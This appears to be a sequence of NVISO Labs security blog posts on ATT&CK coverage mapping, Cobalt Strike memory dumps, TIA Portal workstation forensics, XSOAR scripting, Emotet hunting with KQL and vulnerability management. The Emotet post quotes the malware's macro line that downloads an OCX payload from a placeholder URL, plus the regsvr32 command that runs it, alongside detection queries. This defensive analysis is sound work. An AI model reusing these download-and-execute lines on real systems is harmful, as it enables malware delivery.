When performing adversary emulation, the red team will define a scope of techniques that mimics a known threat to an organization. They usually represent this scope by generating an ATT&CK matrix layer.

Let’s say this is the generated layer from the adversary emulation:

Figure 31: ATT&CK Red team layer

You can compare a threat actor group layer with either your detection or visibility coverage overlay. Use the following command to generate a layer that highlights the differences:

python3 g -g sample-data/groups.yaml -o sample-data/techniques-administration-example-all.yaml -t detection
  • g: threat actor group mapping
  • -g: specify the ATT&CK Groups to include. Another option is to provide a YAML file with a custom group
  • -o: specify what to overlay on the group(s). To overlay Visibility or Detection, provide the technique administration YAML file.
  • -t {group,visibility,detection}: specify the type of overlay. You can choose between group, visibility or detection (default = group)
Figure 32: Threat actor group comparison

If we compare our detection layer to the red team exercise, we will have the following resulting layer:

Figure 33: ATT&CK Threat actor group vs detection

Lastly, you can also generate a layer that will compare your visibility and detection coverage. This will give you a decent overview of the techniques where you have visibility or detection.

To generate this layer, type one of the following commands:

python d -ft ~/Downloads/techniques-administration-endpoints.yaml -o


python v -ft sample-data/techniques-administration-endpoints.yaml -o

Both commands will generate the same output as shown in the following picture.

Figure 34: ATT&CK Detection vs Visibility


In this blog post, we learned how to build, maintain and score visibility and detection coverage with MITRE ATT&CK and DeTT&CT.  Mapping your visibility and detection coverage to TTPs and visualizing it in the MITRE ATT&CK Navigator will help you better grasp your detection maturity. This also provides the possibility to compare your detection coverage against a threat actor behaviour and spot possible gaps.

Maintaining a clear understanding of your current detection capabilities are crucial for your overall security posture. With this knowledge, detection engineers can prioritize the development of new detection rules, and onboarding of new data sources, red teams can tailor their campaigns to test the defenders’ assumptions about their capabilities, and it helps decision makers to track progress and allocate resources to help improve the security posture.

Setting up a baseline for the DETT&CT framework requires some time and resources at first, but once it has been set up, it can provide you with insight on your current detection capabilities and where to focus on improvements.


“DeTT&CT: Mapping your Blue Team to MITRE ATT&CK™ — MB Secure”,


“ATT&CK 101. This post was originally published May… | by Blake Strom | MITRE ATT&CK® | Medium”,

“rabobank-cdc/DeTTECT: Detect Tactics, Techniques & Combat Threats”,

“MITRE DeTTECT – Data Source Visibility and Mapping – YouTube”,

“ATT&CK® Navigator“,

Cobalt Strike: Memory Dumps – Part 6

11 March 2022 at 05:59

This is an overview of different methods to create and analyze memory dumps of Cobalt Strike beacons.

This series of blog posts describes different methods to decrypt Cobalt Strike traffic. In part 1 of this series, we revealed private encryption keys found in rogue Cobalt Strike packages. In part 2, we decrypted Cobalt Strike traffic starting with a private RSA key. In part 3, we explain how to decrypt Cobalt Strike traffic if you don’t know the private RSA key but do have a process memory dump. In part 4, we deal with traffic obfuscated with malleable C2 data transforms. And in part 5, we deal with Cobalt Strike DNS traffic.

For some of the Cobalt Strike analysis methods discussed in previous blog posts, it is useful to have a memory dump: either a memory dump of the system RAM, or a process memory dump of the process hosting the Cobalt Strike beacon.

We provide an overview of different methods to make and/or use memory dumps.

Full system memory dump

Several methods exist to obtain a full system memory dump of a Windows machine. As most of these methods involve commercial software, we will not go into the details of obtaining a full memory dump.

When you have a full system memory dump that is uncompressed, the first thing to check, is for the presence of a Cobalt Strike beacon in memory. This can be done with tool, a tool to extract and analyze the configuration of Cobalt Strike beacons. Make sure to use a 64-bit version of Python, as uncompressed full memory dumps are huge.

Issue the following command: -r memorydump


Figure 1: Using on a full system memory dump

In this example, we are lucky: not only does detect the presence of a beacon configuration, but that configuration is also contained in a single memory page. That is why we get the full configuration. Often, the configuration will overlap memory pages, and then you get a partial result, sometimes even Python errors. But the most important piece of information we get from this command, is that there is a beacon running on the system of which we took a full memory dump.

Let’s assume that our command produced partial results. What we have to do then, to obtain the full configuration, is to use Volatility to produce a process memory dump of the process(es) hosting the beacon. Since we don’t know which process(es) hosts the beacon, we will create process memory dumps for all processes.

We do that with the following command:

vol.exe -f memorydump -o procdumps windows.memmap.Memmap -dump


Figure 2: using Volatility to extract process memory dumps – start of command
Figure 3: using Volatility to extract process memory dumps – end of command

procdumps is the folder where all process memory dumps will be written to.

This command takes some time to complete, depending on the size of the memory dump and the number of processes.

Once the command completed, we use tool again, to analyze each process dump:

Figure 4: using to analyze all extracted process memory dumps – start of command
Figure 4: using to analyze all extracted process memory dumps – detection for process ID 2760

We see that file pid.2760.dmp contains a beacon configuration: this means that the process with process ID 2760 hosts a beacon. We can use this process memory dump if we would need to extract more information, like encryption keys for example (see blog post 3 of this series).

Process memory dumps
Different methods exist to obtain process memory dumps on a Windows machine. We will explain several methods that do not require commercial software.

Task Manager
A full process memory dump can be made with the built-in Windows’ Task Manager.
Such a process memory dump contains all the process memory of the selected process.

To use this method, you have to know which process is hosting a beacon. Then select this process in Task Manager, right-click, and select “Create dump file”:

Figure 6: Task Manager: selecting the process hosting the beacon
Figure 7: creating a full process memory dump

The process memory dump will be written to a temporary folder:

Figure 8: Task Manager’s dialog after the completion of the process memory dump
Figure 9: the temporary folder containing the dump file (.DMP)

Sysinternals’ Process Explorer
Process Explorer can make process memory dumps, just like Task Manager. Select the process hosting the beacon, right-click and select “Create Dump / Create Full Dump“.

Figure 10: using Process Explorer to create a full process memory dump

Do not select “Create Minidump”, as a process memory dump created with this option, does not contain process memory.

With Process Explorer, you can select the location to save the dump:

Figure 12: with Process Explorer, you can choose the location to save the dump file

Sysinternals’ ProcDump
ProcDump is a tool to create process memory dumps from the command-line. You provide it with a process name or process ID, and it creates a dump. Make sure to use option -ma to create a full process memory dump, otherwise the dump will not contain process memory.

Figure 12: using procdump to create a full process memory dump

With ProcDump, the dump is written to the current directory.

Using process memory dumps
Just like with full system memory dumps, tool can be used to analyze process memory dumps and to extract the beacon configuration.
As explained in part 3 of this series, tool can be used to extract the secret keys from process memory dumps.
And if the secret keys are obfuscated, tool can be used to try to defeat the obfuscation, as explained in part 4 of this series.

Memory dumps can be used to detect and analyze beacons.
We developed tools to extract the beacon configuration and the secret keys from memory dumps.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Investigating an engineering workstation – Part 1

15 March 2022 at 09:00

In this series of blog posts we will deal with the investigation of an engineering workstation running Windows 10 with the Siemens TIA Portal Version 15.1 installed. In this first part we will cover some selected classic Windows-based evidence sources, and how they behave with regards to the execution of the TIA Portal and interaction with it. The second part will focus on specific evidence left behind by the TIA Portal itself and how to interpret it. Extracting information from a project and what needs to be considered to draw the right conclusions from this data will be the focus of the third post. Last but not least we will look at the network traffic generated by the TIA portal and what we can do in case the traffic is not being dissected nicely by Wireshark.

For the scope of this series of blog posts we look at the Siemens TIA (Totally Integrated Automation) Portal as the software you can use to interact with, and program PLCs. This is a simplified view, but it is sufficient to follow along with the blog posts. A PLC, or Programmable Logic Controller, can be viewed as a specially designed device to control industrial processes, like manufacturing, energy production and distribution, water supply and much more.  The Siemens Siematic S7-1200, we will mention later in this series, is just one example of the many representatives of this family.

If you approach your first engagement looking at a Windows system running the TIA Portal, you might have the same thought as I had: “Will some of the useful evidences, which I know and used in  other Windows-based investigations, be there waiting to be unearthed?” Since it is always better to know such things before an actual incident takes place, we will cover some of the more standard evidences and how they behave in regards of the TIA Portal. Please note, we will not elaborate on the back and forth of every Windows-based evidence we mention, as this is not meant to be a blog post explaining standard evidence.

Evidence of Execution is available as you would expect. If you know what to look for, it perhaps helps in forming answers faster and more precise.

The Prefetch artifact, if enabled on the system, would be written for “SIEMENS.AUTOMATION.PORTAL.EXE” and can be parsed like any other prefetch file. Additionally, the prefetch file for “SIEMENS.AUTOMATION.DIAGNOSTIC” also gets written or updated when the TIA Portal is started. If we have a look at the ShimCache (aka AppCompatCache) we can try to find the last time of execution by investigating the SYSTEM registry hive. In case of newer Windows systems, like in our example a Windows 10 system, you are out of luck in regards of the last time of execution. It is no longer recorded.

Investigating a Windows 10 system and having the System registry hive already open, the BAM key (ControlSet00x\Services\bam\State\UserSettings\$SID) will provide us with information on date and time for application execution. Knowing the executable name (“Siements.Automation.Portal.exe”) and using it in a simple search quickly reveals the information we are looking for.

Reviewing more user related evidence, by analyzing the NTUser.dat for the user accounts in scope of the investigation, leads us to the UserAssist key. Reviewing the subkeys starting with: “CEBFF5CD…” and “F4E57C4B…” will give us the expected information, like run count, last executed time and so on. Just make sure you are looking into the correct values for each subkey. In the subkey starting with “F4E57C4B…” it is shortcuts we are looking into. In our installation the .lnk files are named “TIA Portal V15.1.lnk”, which is the default value, as it was not renamed by us.

Figure 1: TIA Portal related content in UserAssist Subkey “F4E57C4B…”

For the second subkey (“CEBFF5D…”) we are looking at the executables, so the actual executable name is what we should search for.

Figure 2: TIA Portal related content in UserAssist Subkey “CEBFF5D…”

But what about finding projects that have been present or opened on the machine you are investigating?

First of all we should have an idea how a project looks like. Usually it is not a single file, instead it is a structure of multiple folders and subfolders. Furthermore it contains a file in the root directory of the project folder which you are using to open the project in the TIA Portal. The file extension of these files changes with the Version of the TIA Portal: “.apVERSION” is the current schema. This would mean, a file created with the TIA Portal Version 15.1 will have “ap15_1” as file extension, if created with TIA Portal Version 13 it will be “ap13” as file extension.  

The following screenshot shows the file extensions which can be opened with the TIA Portal Version 15.1 and provides further examples of the naming schema.

Figure 3: TIA Portal Version 15.1 supported file extensions

Below you can see an overview of the files and the directory structure of a test project, in our case created with Version 15.1 of the TIA Portal:

Figure 4: Example listing of a test project created with TIA Portal V15.1

Equipped with this information we can check if and how the “.ap15_1” extension show up in classic file use and knowledge artefacts.

Reviewing the recent files for a user, by investigating the RecentDocs key in the corresponding NTUSER.dat hive shows a subkey for the “.ap15_1” extension.

Figure 5: RecentDocs subkey for .ap15_1 file extension
Figure 6: Example content of RecentDocs subkey for .ap15_1 file extension

The second screenshot shows an excerpt of the “.ap15_1” key parsed by Registry Explorer. Please note, that if a project file is opened via the “Recently used” projects listing, shown on the starting view of the TIA Portal, the RecentDocs key is not updated.

Figure 7: TIA Portal view to open recently used projects

While we are dealing with user specific evidence, we can also check if Jump Lists are available as we would expect. We can use the tool JLECmd by Erik Zimmermann to parse all Jump Lists and review the results in Timeline Explorer. By applying a filter to only show files ending with “.ap” we get the overview shown below.

Figure 8: Jump Lists entries showing .ap15_1 files

Here you can clearly see that we can parse out entries related to “.ap15_1” files for “Quick Access” and also for an App Id not known to JLECmd. This App Id is related to the TIA Portal and we can now also identify the automatic destinations file to open or parse the specific file if we want or need. It will be “4c28c7c161e44256.automaticDestinations-ms”, in our case stored under “C:\Users\nviso\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations”.  If a project is created and saved in the TIA Portal it will not show up in the Jump List. Further if you choose to open a project from the “Recently used” projects list, like described above, the Jump List of the TIA Portal will not be changed.

Figure 9: TIA Portal Recently used projects vs. Jump List

In figure 9 we demonstrated the potential differences between the Jump List (1.) and the “Recently used” projects in the TIA Portal (2.). Obviously the two most recent projects listed by the TIA Portal are missing in the Jump List. The “testproject12.ap15_1” file relates to an already existing project opened via the TIA Portal functionality and the “Pro_dev_C64_blast” project was created via the TIA Portal. The content of the Jump List is shown via the Windows Start menu in this example. Reviewing the Jump List with JLECmd validates these results.

The OpenSaveMRU, also user account specific evidence, is another a place where we can look for the “.ap*” file extension and review activity. Opening the NTUSER.dat for the user account in focus and following the path down to the “OpenSavePidlMRU” key already shows the subkey for a file extension of interest. As always you need to be aware of the evidence you are looking at, the OpenSaveMRU is maintained by the Windows shell dialog box, projects will be showing up here based on if they are opened or saved via the dialog box or not. Double-clicking a “.ap15_1” file will not make it show up here, luckily for us we have the Jump List and the “RecentDocs” key mentioned above.  Also note, that opening a project via the “Recently used” projects lists of the TIA Portal, mentioned above in the section discussing “RecentDocs”, will not change the OpenSaveMRU.

Figure 10: OpenSaveMRU key containing subkeys for ap15_1 files

Needless to say that you can also search the $MFT for files with the extension of interest.

A few things need to be mentioned in regards of managing expectations:

  • The evidence produced by the Windows Operating System or the TIA Portal is not there for forensic or incident response investigations. It usually servers a different purpose than we are using it for. That being said, it should be understood that evidence might behave completely different after software updates or in older/newer versions of the software.
  • Further it is not guaranteed that the software will produce the same evidence in any imaginable edge case.
  • The blog posts are based on our observations and testing results.

Conclusion & Outlook

The standard evidences on a Windows System can already bring some good insights into activities around the TIA Portal. However, we must be aware that the TIA Portal offers its own functions for opening and creating projects, which do not update the jump list, for example. For these cases we can review the “Settings.xml” file. We will focus on the “Settings.xml” file and information we can get out of raw project files in the upcoming blog posts.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

Cortex XSOAR Tips & Tricks – Tagging War Room Entries

By: wstinkens
16 March 2022 at 09:00


The war room in Cortex XSOAR incidents allows a SOC analyst to do additional investigations by using any command available as an automation or integration command. It also contains the output of all tasks used in playbooks (if not in Quiet mode). In this blogpost we will show you how to format output of automations to the war room using the CommandResults class in CommonServerPython, how to add tags to this output and what you can do with these tags.

To support creating tagged war room entries in automations, we have created our own nitro_return_tagged_command_results function which is available on the NVISO Github:


The CommonServerPython automation in Cortex XSOAR contains common Python functions and classes created by Palo Alto that are used in multiple built-in automations. They are appended to the code of each integration/automation before being executed.

One of these classes is CommandResults. Together with the return_results function, it can be used to return (formatted) output from an automation to the war room or context data:

results = [
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
title = "Malware Mitigation Status"

command_result = CommandResults(readable_output=tableToMarkdown(title, results, None, removeNull=True),


By using the outputs_prefix and outputs attributes of the CommandResult class, the following data is created in the Context Data:

By using the readable_output attributes of the CommandResult class, the following entry to the war room is created:

By using the actions menu of the war room entry, you can manually add tags:


The functionality to add tags to war room entries is not available in the return_results function in CommonServerPython, so we created a nitro_return_tagged_command_result function which supports adding tags:

def nitro_return_tagged_command_results(command_result: CommandResults, tags: list):
    Return tagged CommandResults

    :type command_result: ``CommandResults``
    :param command_result: CommandResults object to output with tags
    :type tags: ``list``
    :param tags: List of tags to add to war room entry

    result = command_result.to_context()
    result['Tags'] = tags


This function allow you to provide tags which will be automatically added to the war room entry:

results = [
        'FileName': 'malware.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Detected'
        'FileName': 'evil.exe',
        'FilePath': 'c:\\temp',
        'DetectionStatus': 'Prevented'
tags_to_add = ['evidence', 'malware']
title = "Malware Mitigation Status"

command_result = CommandResults(
        readable_output=tableToMarkdown(title, results, None, removeNull=True),

nitro_return_tagged_command_results(command_result=command_result, tags=tags_to_add)

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_return_tagged_command_results in all your custom automations.

Using Entry Tags

Now that you have created tagged war room entries from an automation, what can you do with this?

We use these tagged war room entries to automatically add output from automations as evidence to the incident Evidence Board. The Evidence board can be used by the analyst to store key artifacts for current and future analysis.

First we use the getEntries command to search the war room for the entries with the “evidence” tag.

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

Then we get the entry IDs from the results of getEntries:

entry_ids = [result.get('ID') for result in results]

Finally we loop through all entry IDs of the tagged war room entries and use the AddEvidence command to add them to the evidence board:

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

The tagged war room entry will now be added to the Evidence Board of the incident:


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

You can reach Wouter via his LinkedIn page.

Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.

Cobalt Strike: Overview – Part 7

22 March 2022 at 09:04

This is an overview of a series of 6 blog posts we dedicated to the analysis and decryption of Cobalt Strike traffic. We include videos for different analysis methods.

In part 1, we explain that Cobalt Strike traffic is encrypted using RSA and AES cryptography, and that we found private RSA keys that can help with decryption of Cobalt Strike traffic

In part 2, we actually decrypt traffic using private keys. Notice that one of the free, open source tools that we created to decrypt Cobalt Strike traffic,, was a beta release. It has now been replaced by tool This tool is capable to decrypt HTTP(S) and DNS traffic. For HTTP(S), it’s a drop-in replacement for

In part 3, we use process memory dumps to extract the decryption keys. This is for use cases where we don’t have the private keys.

In part 4, we deal with some specific obfuscation: data transforms of encrypted traffic, and sleep mode in beacons’ process memory.

In part 5, we handle Cobalt Strike DNS traffic.

And finally, in part 6, we provide some tips to make memory dumps of Cobalt Strike beacons.

The tools used in these blog post are free and open source, and can be found here.

Here are a couple of videos that illustrate the methods discussed in this series:

YouTube playlist “Cobalt Strike: Decrypting Traffic

Blog posts in this series:

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

Hunting Emotet campaigns with Kusto

By: bparys
23 March 2022 at 15:07


Emotet doesn’t need an introduction anymore – it is one of the more prolific cybercriminal gangs and has been around for many years. In January 2021, a disruption effort took place via Europol and other law enforcement authorities to take Emotet down for good. [1] Indeed, there was a significant decrease in Emotet malicious spam (malspam) and phishing campaigns for the next few months after the takedown event.

In November 2021 however, Emotet had returned [2] and is once again targeting organisations on a global scale across multiple sectors.

Starting March 10th 2022, we detected a massive malspam campaign that delivers Emotet (and further payloads) via encrypted (password-protected) ZIP files. The campaign continues as of writing of this blog post on March 23rd, albeit it appears the campaign is lowering in frequency. The campaign appears to be initiated by Emotet’s Epoch4 and (mainly) Epoch5 botnet nodes.

In this blog post, we will first have a look at the particular Emotet campaign, and expand on detection and hunting rules using the Kusto Query Language (KQL).

Emotet Campaign

The malspam campaign itself has the following pattern:

  1. An organisation’s email server is abused / compromised to send the initial email
  2. The email has a spoofed display name, purporting to be legitimate
  3. The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address
  4. The body of the email contains only a few single sentences and a password to open the attachment
  5. The attachment is an encrypted ZIP file, likely an attempt to evade detections, which in turn contains a macro-enabled Excel document (.XLSM)
  6. The Excel will in turn download the Emotet payload
  7. Finally, Emotet may download one of the next stages (e.g. CobaltStrike, SystemBC, or other malware)

Two examples of the email received can be observed in Figure 1. Note the target email address in the subject.

Figure 1 – Two example malspam emails

We have observed emails sent in multiple languages, including, but not limited to: Spanish, Portuguese, German, French, English and Dutch.

The malspam emails are typically sent from compromised email servers across multiple organisations. Some of the top sending domains (based on country code) observed is shown in Figure 2.

Figure 2 – Top sender (compromised) email domains

The attachment naming scheme follow a somewhat irregular pattern: split between text and seemingly random numbers, again potentially to evade detection. A few examples of attachment names that are prepended is shown in Figure 3.

Figure 3 – Example attachment names

After opening the attachment with password provided (typically a 3-4 character password), an Excel file with the same name as the ZIP is observed. When opening the Excel file, we are presented with the usual banner to Enable Macros to make use of all features, as can be seen in Figure 4.

Figure 4 – Low effort Excel dropper

Enabling macros, via an XLM4.0 macro and hidden sheet or cell happens as follows:

=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://<compromised_website>/0Rq5zobAZB/", "..\wn.ocx")

And will then result in regsvr32 downloading and executing an OCX file (DLL):

C:\Windows\SysWow64\regsvr32.exe -s ..\en.ocx

This OCX file is in term the Emotet payload. Emotet can then, as mentioned, either leverage one of its modules (plugins) for data exfiltration, or download the next malware stage as part of its attack campaign.

We will not analyse the Emotet malware itself, but rather focus on how to hunt several parts of the stage using the Kusto Query Language (KQL) in environments that make use of Office 365.

Hunting with KQL

Granted you are ingesting the right logs (license and setup) and have the necessary permissions (Security Reader will suffice), visit the Microsoft 365 Defender Advanced Hunting’s page and query builder:

Query I – Hunting the initial campaign

First, we want to track the scope and size of the initial Emotet campaign. We can build the following query:

| where FileType == "zip" and FileName endswith_cs "zip"
| join kind=inner (EmailEvents | where Subject contains RecipientEmailAddress and DeliveryAction == "Delivered" and EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

The query above focuses on Step 3 of this campaign: The subject of the email is a reply “RE:” or forward “FW:” and contains the recipient’s email address. In this query, we filter on:

  1. Any email that has a ZIP attachment;
  2. Where the subject contains the recipient’s email address;
  3. Where the email direction is inbound and the mail is delivered (so not junked or blocked).

This yields 22% of emails that have been delivered – the others have either been blocked or junked. However, we know that this campaign is larger and might have been more successful.

Meaning, we need to improve our query. We can now create an improved query like below, where the sender display name has an alias (or is spoofed):

| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction == "Delivered") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now results in 25% of emails that have been delivered, for the same timespan (campaign scope & size) as set before. The query can now further be finetuned to show all emails except the blocked ones. Even when malspam or phishing emails are Junked, the user may manually go to the Junk Folder, open the email / attachment and from there get compromised.

The final query:

| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound" and DeliveryAction != "Blocked") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress

This query now displays 73% of the whole Emotet malspam campaign. You can now export the result, create statistics and blocking rules, notify users and improve settings or policies where required. An additional user awareness campaign can help to stress that Junked emails should not be opened when it can be avoided.

As an extra, if you merely want to create statistics on Delivered versus Junked versus Blocked, the following query will do just that:

| where FileType == "zip" and FileName endswith_cs "zip" and SenderDisplayName startswith_cs "<"
| join kind=inner (EmailEvents | where EmailDirection == "Inbound") on NetworkMessageId, SenderFromAddress, RecipientEmailAddress
| summarize Count = count() by DeliveryAction

Query II – Filtering on malspam attachment name

This query is of lower fidelity than others in this blog, as it can produce a large number of False Positives (FPs), depending on your organisations’ geographical location and amount of emails received. Nevertheless, it can be useful to run the query and build further on it – creating a baseline. The query below displays an extract of subjects from Table 1 and according hunt:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

Running this rule delivers a considerable amount of results, even when applying the string length (strlen) to be less than 20 characters as we have observed in this campaign. Finetune the query, we can add one more line to filter on display name as we have also created in Query I:

let attachmentname = dynamic(["adjunto","adjuntos","anhang","archiv","archivo","attachment","avis","aviso","bericht","comentarios","commentaires","comments","correo","data","datei","datos","detail","details","detalle","doc","document","documentación","documentation","documentos","documents","dokument","détails","escanear","fichier","file","filename","hinweis","info","informe","list","lista","liste","mail","mensaje","message","nachricht","notice","pack","paquete","pièce","rapport","report","scan","sin titulo","untitled"]);
| where FileName has_any(attachmentname) and strlen(FileName) < 20 and FileType == "zip" and SenderDisplayName startswith_cs "<"
| join EmailEvents on NetworkMessageId
| where DeliveryAction == "Delivered" and EmailDirection == "Inbound"

This now results in 20% True Positives (TP) as opposed to the original query, where we would have needed to filter extensively. Note this query can be further adopted to your needs, for example, you could remove the SenderDisplayName parameter again, and set other parameters (e.g. string length, email language, …).

Query III – Searching for regsvr32 doing bad things

Most detection & hunting teams, Security Operation Center (SOC) analysts, incident responders and so on will be acquainted with the term “lolbins”, also known as living off the land binaries. In short, any binary that is part of the native Operating System, in this case Windows, and which can be abused for other purposes than what it is intended for.

In this case, regsvr32 is leveraged – it is typically used by attackers to – you guessed it – register and execute DLLs! The query below will leverage a simple regular expression (regex) to hunt for execution of regsvr32 attempting to run an OCX file, as was seen in this Emotet campaign.

| where FileName =~ "regsvr32.exe" and ProcessCommandLine matches regex @"\.\.\\.+\.ocx$"


Emotet is still a significant threat to be reckoned with since its return near the end of last year.

This blog post focused on dissecting Emotet’s latest malspam campaign as well as creating hunting queries using KQL to hunt for and respond to any potential security incident. The queries can also be converted to other formats (e.g. Splunk Query Language using for example) to allow for broader hunting efforts or where using KQL might not be an option.

Thanks to my colleague Maxime Thiebaut (@0xthiebaut) for assistance in building the queries.

About the author

Bart Parys Bart is a manager at NVISO where he mainly focuses on Threat Intelligence, Incident Response and Malware Analysis. As an experienced consumer, curator and creator of Threat Intelligence, Bart loves to and has written many TI reports on multiple levels such as strategic and operational across a wide variety of sectors and geographies. Twitter: @bartblaze

Vulnerability Management in a nutshell

28 March 2022 at 15:00


Vulnerability Management plays an important role in an organization’s line of defense. However, setting up a Vulnerability Management process can be very time consuming. This blogpost will briefly cover the core principles of Vulnerability Management and how it can help protect your organization against threats and adversaries looking to abuse weaknesses.

What is Vulnerability Management

To better understand Vulnerability Management, it is important to know what it stands for. On the internet, Vulnerability Management has several definitions. Sometimes these can be confusing and misinterpreted because different wording is used across several platforms. Several products exist that can assist an organization in creating a Vulnerability Management Process. Some of the current market leaders include but are not limited to: CrowdStrike, Tenable.IO and Rapid7.

According to Tenable, Vulnerability Management is an ongoing process that includes proactive asset discovery, continuous monitoring, mitigation, remediation and defense tactics to protect your organization’s modern IT attack surface from Cyber Exposure.[1]

According to Rapid7, Vulnerability Management is the process of identifying, evaluating, treating, and reporting on security vulnerabilities in systems and the software that runs on them. This, implemented alongside with other security tactics, is vital for organizations to prioritize possible threats and minimizing their attack surface.[2]

According to CrowdStrike, Vulnerability Management means the ongoing, regular process of identifying, assessing, reporting on, managing and remediating security vulnerabilities across endpoints, workloads, and systems. Typically, a security team will leverage a Vulnerability Management tool to detect vulnerabilities and utilize different processes to patch or remediate them.[3]

Why Vulnerability Management

A well-defined Vulnerability Management process can be leveraged to decrease the cyber exposure of an organization. This ranges from identifying open RDP ports on internet-facing Shadow IT to outdated third-party software installed on the domain controller. In case vulnerabilities are abused by attackers, they could obtain access to the internal network, distribute malware such as Ransomware, obtain sensitive information and the list goes on. Decreasing your exposure and increasing patch management can reduce the likelihood of an attack happening on the organization’s infrastructure.

Vulnerability Management core principles

If we take a look at the definitions above, several terms are being used over and over again. We can summarize Vulnerability Management in 6 steps. As Vulnerability Management is a continuous process, each individual step provides input for subsequent steps. It is important to note that this is a simplified version of Vulnerability Management. The following image illustrates what a Vulnerability Management process can look like:

Figure 1 – Vulnerability Management Process


Identification of the scope is the first part of the Vulnerability Management cycle. This is an important phase, as you can’t protect what you don’t know. If we take a look at the CIS Critical Security Controls[4], the first step to stop today’s most pervasive and dangerous attacks is to “Actively manage (inventory, track, and correct) all enterprise assets“ – meaning that it is really important for an organization to know what infrastructure they have. The first step in the Vulnerability Management program is to identify all known and unknown assets and start prioritizing them. This can include but is not limited to the following information:

  • Which assets are most critical to the business?
  • Which assets are externally exposed?
  • Which assets have confidential information?

The process of identifying assets can be automized with a combination of discovery scans on the internal network and identification of known and unknown external assets through attack surface management platforms. This phase is a crucial part, as all next steps are based on the scope defined during the identification phase.


Assessing the infrastructure for weaknesses can be automated through vulnerability scanning with known scanners such as Tenable.IO and Rapid7 However, manual verification might be needed to determine the actual exploitability of vulnerabilities as vulnerability scanners do not cover all security controls in place such as specific workarounds that were implemented to limit the likelihood of exploitation. By using a combination of automated scanners and manual verification of the issues, a comprehensive view on what vulnerabilities are currently affecting your organization can be established.


Some organizations might not prioritize their vulnerabilities obtained by automatic scanners or penetration tests. However, as Seth Godin said: “Data is not useful until it becomes information”. It is the task of the Vulnerability Management team to prioritize the vulnerabilities not only on their actual technical impact but also to keep in mind the business impact. For example, a critical Log4J vulnerability on an externally available and well-known website should be remediated sooner that the same Log4J vulnerability on a lunch-serving testing server that is only accessible from the internal network.


After all issues have been prioritized, an actionable report should be given to the teams that will actually perform the patching/resolving of the issues. It is important for the Vulnerability Management team to keep in mind that they should create actionable tickets or remediating actions for the operations team. A bad example of a ticket can be as follows:

Title: Log4J identified

Description: Log4J was identified on your server

Resolution: Please fix this as soon as possible

A good example of a ticket can be something like this[5]:

Title: Apache Log4j Remote Code Execution (Log4Shell)

Severity: Critical

Estimated Time to Fix: 1 hour

Description: Apache Log4j is an open source Java-based logging framework leveraged within numerous Java applications. Apache Log4j versions 2.0-beta9 to 2.15.0 suffer from insufficient protections on message lookup substitutions when dealing with user controlled input. By crafting a malicious string, an attacker could leverage this issue to achieve a remote code execution on the Log4j instance used by the target application.

Solution: Upgrade Apache to version 2.16.0 or later.

Affected devices:,

CVE’s: CVE-2021-44228



Resolving vulnerabilities should be the goal of the entire Vulnerability Management process, as this will decrease the exposure of your organization. Remediation is a process on its own and might consist of automatic patching, process updates, Group Policy updates, …. With the actionable ticketing performed by the Vulnerability Management team in the previous phase, it should be easy for the operations teams to identify what actions need to be done and how long it will take. After successful remediation, a validation of the remediation should be performed by the Vulnerability Management team. If the issue is resolved, the issue can be closed.


As Vulnerability Management is a continuous process, it should be reviewed all the time. A Vulnerability Management program was like Rome not built in one day. However, over time a robust and reliable Vulnerability Management process will be in place if the processes are well defined and known within the organization.






Investigating an engineering workstation – Part 2

30 March 2022 at 08:00

In this second post we will focus on specific evidence written by the TIA Portal. As you might remember, in the first part we covered standard Windows-based artefacts regarding execution of the TIA Portal and usage of projects.

The TIA Portal maintains a file called “Settings.xml” under the following path: C:\Users\$USERNAME\AppData\Roaming\Siemens\Portal V15_1\Settings\. Please remember we used version 15.1 only. The path contains the version number for the TIA Portal, so at least the path will most likely change for different versions. It is also possible that the content and the behaviour of the nodes discussed below changes with different versions of the TIA Portal.
